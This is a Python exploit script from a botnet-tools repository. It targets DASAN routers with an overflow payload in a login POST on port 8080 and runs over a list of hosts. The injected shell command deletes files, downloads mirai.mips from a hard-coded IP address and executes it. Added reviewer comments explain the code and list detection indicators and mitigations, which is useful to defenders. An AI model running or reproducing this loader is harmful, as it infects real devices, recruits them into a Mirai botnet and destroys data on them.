R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/DASAN/dasan.py
#!/usr/bin/python
#zonehax is big 0 day exploiter 10/10
import sys, socket, json, time, ssl, struct, os
from threading import Thread
# Loader configuration and request construction (Python 2 syntax throughout).
# NOTE(review): this listing lost its indentation and carried viewer line
# numbers; the nesting below is reconstructed -- confirm against the repository
# file before relying on it.
if len(sys.argv) < 2:
    print "Usage: python "+sys.argv[0]+" <list>"
    sys.exit()
# Every host in the list is contacted on TCP/8080; the reply is read with a
# single recv of at most 4096 bytes.
port = 8080
buf = 4096
# Two hard-coded 32-bit values, each a fixed offset from pre_pl0, packed
# big-endian. Presumably addresses tied to one firmware build -- not verifiable
# from this listing.
pre_pl0 = 0x2ad0c000
pre_pl2 = pre_pl0 + 0x00115d40
pl2 = struct.pack(">i",pre_pl2)
pre_pl3 = pre_pl0 + 0x0003CC9C
pl3 = struct.pack(">i",pre_pl3)

# Shell command string carried inside the request. As written it deletes the
# contents of the working directory, fetches mirai.mips over plain HTTP from
# 23.130.192.132, marks it executable and runs it with the argument
# "exploit.dasan". Indicators a defender can take from these lines: the
# download host, the /33bi/mirai.mips path, and that process argument.
# payload2..payload4 are byte-for-byte copies of payload.
payload = "rm -rf *; wget http://23.130.192.132/33bi/mirai.mips; chmod 777 mirai.mips; ./mirai.mips exploit.dasan"
payload2 = "rm -rf *; wget http://23.130.192.132/33bi/mirai.mips; chmod 777 mirai.mips; ./mirai.mips exploit.dasan"
payload3 = "rm -rf *; wget http://23.130.192.132/33bi/mirai.mips; chmod 777 mirai.mips; ./mirai.mips exploit.dasan"
payload4 = "rm -rf *; wget http://23.130.192.132/33bi/mirai.mips; chmod 777 mirai.mips; ./mirai.mips exploit.dasan"
# Value placed in the `action` form field: filler bytes, the two packed values,
# 24 semicolons, then the command string. The field is 780 bytes long before
# the command even starts and contains non-printable bytes plus shell
# metacharacters, which no legitimate login submission would carry -- a usable
# detection condition wherever the request body can be inspected.
pre_data = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload
pre_data2 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload2
pre_data3 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload3
pre_data4 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload4
# Login form body. The user id and password are the dummy value "a", so the
# request does not rely on valid credentials.
post_data = "action="+pre_data+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
post_data2 = "action="+pre_data2+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
post_data3 = "action="+pre_data3+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
post_data4 = "action="+pre_data4+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
# Complete HTTP/1.1 request text for POST /cgi-bin/login_action.cgi, with
# Content-Length computed from the body. Host and Referer are hard-coded to
# 192.168.1.100:8080 whatever the real destination is, and the User-Agent is a
# bare "Mozilla/5.0"; these static values can serve as signatures where TLS is
# terminated or the device's web log is available.
# headers4 (with post_data4, pre_data4, payload4) is built but dasan() sends
# only headers, headers2 and headers3.
# Mitigation pointers: keep the management interface on 8080 unreachable from
# untrusted networks, and restrict device egress so the second-stage download
# cannot complete.
headers = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
headers2 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data2))+"\r\n\r\n"+str(post_data2)
headers3 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data3))+"\r\n\r\n"+str(post_data3)
headers4 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data4))+"\r\n\r\n"+str(post_data4)
# `i` counts replies that contained "200 OK"; `ips` holds the raw lines of the
# host list named on the command line (the file handle is never closed
# explicitly).
i = 0
ips = open(sys.argv[1]).readlines()
def dasan(host):
    """Send the prebuilt login POSTs to one host over TLS and count a "200 OK" reply.

    host: one line from the target list; a trailing newline is stripped.
    Returns nothing. Increments the module-level counter `i` when the first
    recv (up to `buf` bytes) contains "200 OK".
    """
    # NOTE(review): indentation was lost in this listing; in particular the
    # placement of s.close() after (not inside) the `if` is reconstructed --
    # confirm against the repository file.
    global i
    host = host.strip("\n")
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # wrap_socket is called with no arguments, so no certificate
        # validation is requested for the connection.
        s = ssl.wrap_socket(sock)
        s.connect((host, port))
        # Three identical requests are written back-to-back on the same
        # connection before any reply is read. On the device side this shows
        # as repeated oversized POSTs to /cgi-bin/login_action.cgi from one
        # client within a single TLS session.
        s.send(headers)
        s.send(headers2)
        s.send(headers3)
        resp = s.recv(buf).strip()
        # The counter only records that an HTTP 200 came back; nothing here
        # checks that the command ran, so the tool's own tally is not evidence
        # of which devices were actually compromised.
        if "200 OK" in resp:
            i += 1
        s.close()
    except:
        # Bare except: every failure (refused connection, TLS error, reset)
        # is discarded silently.
        pass
def worker():
    """Start one dasan() thread per entry in `ips`, then wait and exit this thread."""
    # NOTE(review): indentation was lost in this listing; the sleep(30) and
    # sys.exit are placed after the loop by reconstruction -- confirm against
    # the repository file.
    for ip in ips:
        try:
            ip = ip.strip("\r\n")
            # One thread per host, started 10 ms apart. On the network this
            # appears as a rapid fan-out of outbound TLS connections to port
            # 8080 across many addresses from a single source.
            t = Thread(target=dasan, args=(ip,))
            t.start()
            time.sleep(0.01)
        except:
            # Failures to start a thread are ignored.
            pass
    time.sleep(30)
    sys.exit("Finished Scanning")
# Entry sequence: run worker() on a background thread, dump the first prebuilt
# request to stdout, then redraw a one-line status counter once per second.
# NOTE(review): indentation was lost in this listing; nesting is reconstructed
# -- confirm against the repository file.
workerthrd = Thread(target=worker)
workerthrd.start()
print headers
while True:
    try:
        # `sent` is assigned but not used; the status line reads `i` directly.
        sent = i
        # ANSI colour codes around the text "Payload Sent To [<i>] Devices";
        # the number is the count of "200 OK" replies, not confirmed infections.
        sys.stdout.write("\r\033[33mPayload Sent To \033[92m[\033[93m"+str(i)+"\033[92m]\033[33m Devices\033[0m")
        sys.stdout.flush()
        time.sleep(1)
    except KeyboardInterrupt:
        sys.exit("Exiting On User Input")
    except:
        pass